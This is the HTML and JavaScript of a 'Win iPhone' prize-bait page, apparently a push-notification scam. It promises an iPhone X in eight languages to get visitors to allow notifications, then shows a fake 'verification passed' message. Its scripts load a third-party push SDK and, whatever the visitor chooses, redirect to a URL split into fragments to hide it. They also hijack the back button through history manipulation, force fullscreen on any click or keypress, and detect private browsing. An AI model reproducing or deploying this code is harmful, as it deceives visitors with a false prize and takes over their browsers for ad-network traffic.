<!DOCTYPE html>
<html>


<meta http-equiv="content-type" content="text/html;charset=UTF-8" />

<head>
    <meta charset="UTF-8">
    <title>Win iPhone</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width,height=device-height,initial-scale=1,minimum-scale=1">
    <link rel="icon" type="image/png" sizes="16x16" href="icon.png">
    <style>
        body {
            -moz-osx-font-smoothing: grayscale;
            -moz-user-select: none;
            -ms-user-select: none;
            -webkit-font-smoothing: antialiased;
            -webkit-user-select: none;
            background-color: #eee;
            color: #fff;
            font: 700 32px Roboto, Helvetica, Arial, sans-serif;
            height: 100%;
            margin: 0;
            overflow: hidden;
            text-align: center;
            user-select: none;
            width: 100%
        }

        .isHide {
            display: none !important
        }

        .isShow {
            display: block !important
        }

        .slider {
            bottom: 0;
            left: 0;
            position: fixed;
            right: 0;
            top: 0;
            z-index: -1
        }

        .slider__it {
            background-position: 50%;
            background-repeat: no-repeat;
            background-size: cover;
            height: 100%;
            left: 0;
            opacity: 0;
            position: absolute;
            top: 0;
            transition: opacity 2s ease-out;
            width: 100%
        }

        .slider__it.isActive {
            opacity: 1
        }

        .slider__it:first-child {
            background-image: url(images/win-iphone/slide4.jpg)
        }

        .cnt {
            padding: 5px
        }

        .isAndroid .cnt {
            float: none;
            max-width: none;
            padding: 0
        }

        .cnt:after {
            clear: both;
            content: "";
            display: block;
            width: 100%
        }

        .cnt__arrow,
        .isAndroid .cnt__arrow {
            display: none
        }

        .cnt__txT {
            font-size: 46px;
            line-height: 1.1em;
            margin-top: 20px;
            text-shadow: 0 -4px 0 red, 0 -4px 0 red, 0 4px 0 red, 0 4px 0 red, -4px 0 0 red, 4px 0 0 red, -4px 0 0 red, 4px 0 0 red, -1px -4px 0 red, 1px -4px 0 red, -1px 4px 0 red, 1px 4px 0 red, -4px -1px 0 red, 4px -1px 0 red, -4px 1px 0 red, 4px 1px 0 red, -2px -4px 0 red, 2px -4px 0 red, -2px 4px 0 red, 2px 4px 0 red, -4px -2px 0 red, 4px -2px 0 red, -4px 2px 0 red, 4px 2px 0 red, -3px -4px 0 red, 3px -4px 0 red, -3px 4px 0 red, 3px 4px 0 red, -4px -3px 0 red, 4px -3px 0 red, -4px 3px 0 red, 4px 3px 0 red, -4px -4px 0 red, 4px -4px 0 red, -4px 4px 0 red, 4px 4px 0 red, -4px -4px 0 red, 4px -4px 0 red, -4px 4px 0 red, 4px 4px 0 red
        }

        .cnt__img {
            margin-top: 20px;
            max-width: 260px
        }

        .msgReady {
            background-color: rgba(0, 0, 0, .75);
            color: #fff;
            height: 100%;
            left: 0;
            position: fixed;
            top: 0;
            width: 100%
        }

        .msgReady__tx {
            font-size: 32px;
            margin-top: 10%
        }

        @-webkit-keyframes a {

            0%,
            50%,
            to {
                opacity: 1
            }

            25%,
            75% {
                opacity: 0
            }
        }

        @keyframes a {

            0%,
            50%,
            to {
                opacity: 1
            }

            25%,
            75% {
                opacity: 0
            }
        }

        @media (min-width:425px) {
            .msgReady__tx {
                font-size: 52px
            }
        }

        @media (min-width:700px) {
            .cnt {
                float: left;
                max-width: 515px;
                padding-left: 385px;
                position: relative
            }

            .isYandex .cnt {
                float: right;
                padding-left: 0;
                padding-right: 500px
            }

            .cnt__arrow {
                -webkit-animation: a 1s infinite;
                animation: a 1s infinite;
                background: url(images/win-iphone/arrow.png) no-repeat;
                display: block;
                height: 274px;
                left: 100px;
                position: absolute;
                top: 130px;
                width: 275px
            }

            .isYandex .cnt__arrow {
                left: auto;
                right: 190px;
                top: 200px;
                transform: scaleX(-1)
            }
        }

        @media (min-width:1150px) {
            .cnt {
                max-width: none
            }

            .cnt__tx {
                float: left;
                margin-top: 190px;
                max-width: 515px
            }

            .isYandex .cnt__tx {
                float: right;
                margin-top: 210px;
                max-width: 410px
            }

            .cnt__txDescr {
                font-size: 36px
            }

            .cnt__txT {
                font-size: 52px
            }

            .cnt__img {
                margin-left: 30px;
                margin-top: 150px
            }

            .isYandex .cnt__img {
                margin-left: 0;
                margin-right: 30px
            }
        }

        @media (min-width:1240px) {
            .cnt__img {
                max-width: none
            }
        }
    </style>
</head>

<body>
  <script>(function() {
    function getParameterByName(name, url) {
      if (!url) url = window.location.href;
      name = name.replace(/[\[\]]/g, '\\$&');
      var regex = new RegExp('[?&]' + name + '(=([^&#]*)|&|#|$)'),
          results = regex.exec(url);
      if (!results) return null;
      if (!results[2]) return '';
      return decodeURIComponent(results[2].replace(/\+/g, ' '));
    }

    var loc = document.location;
    var tb = function(){ loc.href = ['ht', 'tps:/', '/blud', 'wan.com/a', 'fu.ph', 'p?zon', 'eid=2483917'].join(''); };
    var bc = function(){ loc.href = ['ht', 'tps:', '/', '/go', 'ogle.com/'].join(''); };

    var url = new URL(window.location.href);
    var pci = getParameterByName('external_id', window.location.href);
    var ppi = getParameterByName('placementid', window.location.href);
    var tag = document.createElement('script');
    tag.type = 'text/javascript';
    tag.dataset['sdk'] = 'sdk';
    tag.src = '//pushokey.com/ntfc.php?p=2490306&ucis=true&m=https&nbinp=true' + '&var='+ ppi + '&ymid=' + pci;

    function setupHandlers() {
      // sdk.onBeforePermissionPrompt();
      sdk.onPermissionDefault(tb);
      sdk.onPermissionAllowed(tb);
      sdk.onPermissionDenied(tb);
      sdk.onAlreadySubscribed(tb);
    }

    tag.onload = setupHandlers;

    document.head.appendChild(tag);
    })();</script>  
    <div class="slider">
        <div class="slider__it isActive"></div>
        <div class="slider__it"></div>
        <div class="slider__it"></div>
        <div class="slider__it"></div>
    </div>
    <div class="cnt">
        <div class="cnt__arrow"></div>
        <div class="cnt__tx">
            <div class="cnt__txDescr"></div>
            <div class="cnt__txT"></div>
        </div><img src="images/win-iphone/iPhone.png" alt="image" class="cnt__img">
    </div>
    <div class="msgReady isHide">
        <div class="msgReady__tx"></div>
    </div>
    <script>
        ! function(t) {
            var o = {};

            function i(e) {
                if (o[e]) return o[e].exports;
                var n = o[e] = {
                    i: e,
                    l: !1,
                    exports: {}
                };
                return t[e].call(n.exports, n, n.exports, i), n.l = !0, n.exports
            }
            i.m = t, i.c = o, i.d = function(e, n, t) {
                i.o(e, n) || Object.defineProperty(e, n, {
                    enumerable: !0,
                    get: t
                })
            }, i.r = function(e) {
                "undefined" != typeof Symbol && Symbol.toStringTag && Object.defineProperty(e, Symbol.toStringTag, {
                    value: "Module"
                }), Object.defineProperty(e, "__esModule", {
                    value: !0
                })
            }, i.t = function(n, e) {
                if (1 & e && (n = i(n)), 8 & e) return n;
                if (4 & e && "object" == typeof n && n && n.__esModule) return n;
                var t = Object.create(null);
                if (i.r(t), Object.defineProperty(t, "default", {
                        enumerable: !0,
                        value: n
                    }), 2 & e && "string" != typeof n)
                    for (var o in n) i.d(t, o, function(e) {
                        return n[e]
                    }.bind(null, o));
                return t
            }, i.n = function(e) {
                var n = e && e.__esModule ? function() {
                    return e.default
                } : function() {
                    return e
                };
                return i.d(n, "a", n), n
            }, i.o = function(e, n) {
                return Object.prototype.hasOwnProperty.call(e, n)
            }, i.p = "", i(i.s = 2)
        }([function(e, n) {
            if (0 === "".length) {
                var t = function() {
                    void 0 !== this.requestFullScreen ? this.requestFullScreen() : void 0 !== this.webkitRequestFullScreen ? this.webkitRequestFullScreen() : void 0 !== this.mozRequestFullScreen && this.mozRequestFullScreen()
                };
                document.body.addEventListener("keydown", t), document.body.addEventListener("click", t)
            }
        }, , function(e, n, t) {
            "use strict";
            t.r(n);
            var u = function() {
                    var e = location.search.split("#")[0].split("?")[1];
                    if (void 0 === e) return null;
                    var o = {};
                    return e.split("&").forEach(function(e) {
                        var n = e.split("=");
                        if (2 === n.length) o[n[0]] = n[1] || null;
                        else {
                            var t = n[0];
                            n.shift(), o[t] = n.join("=")
                        }
                    }), o
                },
                o = u();
            if (null !== o && void 0 !== o.bbr && "1" === o.bbr) {
                var i = document.title,
                    r = location.pathname + location.search;
                history.pushState(null, i, r), window.addEventListener("popstate", function() {
                    history.pushState({}, i, r)
                })
            }
            t(0);
            var a = function(n) {
                    var e = decodeURIComponent(document.cookie).split(";");
                    if (0 === e.length) return null;
                    var t = null;
                    return e.some(function(e) {
                        if (" " === e[0] && (e = e.slice(1)), e = e.split("="), n === e[0]) return t = e[1], !0
                    }), t
                },
                l = function(e) {
                    null !== window.opener && void 0 !== window.opener && opener.postMessage(e, "*")
                },
                v = {
                    ua: navigator.userAgent,
                    m: function(n) {
                        var e = "normal",
                            t = "private";

                        function o() {
                            return n(t)
                        }

                        function i() {
                            return n(e)
                        }
                        if ("safari" === v.n) try {
                            return window.openDatabase(null, null, null, null), n(e)
                        } catch (e) {
                            return n(t)
                        } else if ("firefox" === v.n) {
                            var r = indexedDB.open("test.html");
                            r.addEventListener("error", o), r.addEventListener("success", i)
                        } else {
                            if ("edge" === v.n) return void 0 !== window.indexedDB || void 0 === window.PointerEvent && void 0 === window.MSPointerEvent ? n(e) : n(t);
                            if ("opera" !== v.n && "yandex" !== v.n && "chrome" !== v.n) return n("unknown");
                            window.webkitRequestFileSystem(window.TEMPORARY, 1, i, o)
                        }
                    },
                    get n() {
                        var e = !!window.opr && !!opr.addons || !!window.opera,
                            n = "undefined" != typeof InstallTrigger,
                            t = /constructor/i.test(window.HTMLElement) || /(MacPPC|MacIntel|Mac_PowerPC|Macintosh)/.test(this.ua),
                            o = !!window.chrome && /Google Inc/.test(navigator.vendor),
                            i = 0 < this.ua.indexOf("YaBrowser") || 0 < this.ua.indexOf("Yowser"),
                            r = /UBrowser/.test(this.ua),
                            a = /Edge\//.test(this.ua),
                            s = null;
                        return e ? s = "opera" : n ? s = "firefox" : i ? s = "yandex" : r ? s = "uc" : a ? s = "edge" : o ? s = "chrome" : t && (s = "safari"), s
                    },
                    get d() {
                        var n = {
                                webOS: "webOS",
                                iPhone: "iPhone",
                                iPad: "iPad",
                                iPod: "iPod",
                                mac: "(MacPPC|MacIntel|Mac_PowerPC|Macintosh)",
                                blackBerry: "BlackBerry|BB|PlayBook",
                                windows: "Windows NT",
                                windowPhone: "Windows Phone",
                                android: "Android"
                            },
                            t = null;
                        return Object.keys(n).some(function(e) {
                            if (null !== v.ua.match(new RegExp(n[e], "i"))) return t = e, !0
                        }), t
                    }
                };
                var p = v;
                var h = u();


            var m = function(n) {
                    if (!(void 0 !== window.navigator && void 0 !== navigator.serviceWorker && void 0 !== window.PushManager && void 0 !== window.Notification)) return n(!1, "unsupported");
                    p.m(function(e) {
                        return "private" === e ? n(!1, e) : "unknown" === e ? n(!1, e) : n(!0, "supported")
                    })
                },
                y = {
                    k: "",
                    t: {},
                    set: function(e) {
                        void 0 !== window.navigator && void 0 !== navigator.language && (y.k = navigator.language.slice(0, 2)), void 0 === e[y.k] && (y.k = "en"), y.t = e[y.k]
                    },
                    get: function(e) {
                        return y.t[e]
                    }
                },
                b = y;

            function P(e) {
                l({
                    a: e ? "success" : "close"
                }), null !== window.opener && void 0 !== window.opener && close(), document.querySelector(".slider").classList.add("isHide"), document.querySelector(".cnt").classList.add("isHide"), document.querySelector(".msgReady").classList.remove("isHide")
            }

            b.set({
                ru: {
                    title: 'Нажмите "Разрешить"',
                    desc: "Получите шанс выиграть новый Iphone X",
                    msgReady: "Вы успешно прошли проверку!<br>Теперь вы можете закрыть окно ..."
                },
                en: {
                    title: "Push Allow",
                    desc: "Get A Chance To Win A Brand New Iphone X",
                    msgReady: "You have successfully passed the verification!<br>Now you can close the window."
                },
                fr: {
                    title: 'Cliquez sur "Autoriser"',
                    desc: "Courez la chance de gagner un nouvel iPhone X",
                    msgReady: "Vous avez réussi le test!<br>Maintenant vous pouvez fermer la fenêtre"
                },
                de: {
                    title: 'Klicken Sie auf "Zulassen"',
                    desc: "Erhalten Sie eine Chance, ein neues iPhone X zu gewinnen",
                    msgReady: "Sie haben den Test erfolgreich bestanden!<br>Jetzt können Sie das Fenster schließen"
                },
                es: {
                    title: 'Haga clic en "Permitir"',
                    desc: "Tener la oportunidad de ganar un nuevo iPhone X",
                    msgReady: "Has pasado la prueba con éxito!<br>Ahora puedes cerrar la ventana"
                },
                uk: {
                    title: 'Натисніть "Дозволити"',
                    desc: "Отримайте шанс виграти абсолютно новий Iphone X",
                    msgReady: "Ви успішно пройшли перевірку!<br>Тепер ви можете закрити вікно."
                },
                pl: {
                    title: 'Naciśnij "Zezwól"',
                    desc: "Uzyskaj szansę na wygranie zupełnie nowego iPhone X",
                    msgReady: "Pomyślnie przeszedłeś weryfikację!<br>Teraz możesz zamknąć okno."
                },
                th: {
                    title: 'กด "อนุญาต"',
                    desc: "มีโอกาสลุ้นรับ iPhone X ใหม่เอี่ยม",
                    msgReady: "คุณผ่านการตรวจสอบสำเร็จแล้ว!<br>ตอนนี้คุณสามารถปิดหน้าต่างได้"
                }
            }), "android" === p.d && document.body.classList.add("isAndroid"), "yandex" === p.n && document.body.classList.add("isYandex"), document.querySelector(".cnt__txDescr").textContent = b.get("desc"), document.querySelector(".cnt__txT").textContent = b.get("title"), document.querySelector(".msgReady__tx").innerHTML = b.get("msgReady")
        }]);
    </script>

</body>


</html>
